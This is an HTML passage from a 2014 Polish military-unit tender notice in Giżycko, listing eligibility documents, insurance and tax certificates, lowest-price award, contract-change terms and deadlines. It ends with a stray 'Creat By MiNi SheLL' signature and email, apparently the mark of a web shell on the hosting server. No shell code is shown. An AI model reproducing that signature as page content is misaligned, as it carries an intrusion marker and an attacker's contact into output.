<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału 
w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia, jeżeli przedłoży opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż  70 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>FORMULARZ OFERTOWY ­wypełniony i podpisany wg wzoru Zamawiającego (załącznik nr 1 do SIWZ). DOWÓD WNIESIENIA WADIUM, PEŁNOMOCNICTWO złożone w formie oryginału lub kopii poświadczonej notarialnie.W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy. W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp). W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia - pisemne,(w oryginale) zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem § 11 umowy. Zamawiający dopuszcza  zmianę terminu zakończenia robót w przypadku:wystąpienia robót dodatkowych, od których uzależnione jest wykonanie zamówienia podstawowego, klęsk żywiołowych uniemożliwiających realizację przedmiotu zamówienia, wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy, Zamawiający zastrzega możliwość zmiany wysokości zobowiązania określonego w § 5 ust. 1 umowy w przypadku zmiany stawki podatku od towarów i usług w 2014r. Wszelkie zmiany umowy mogą być dokonane jedynie za zgodą obu Stron w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mon.gov.pl,www.24wog.wp.mil.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4352 ul. Nowowiejska 20 11-500 Giżycko kancelaria nr 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2014 godzina 08:30, miejsce: Jednostka Wojskowa 4352 ul. Nowowiejska 20 11-500 Giżycko kancelaria jawna nr 109..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com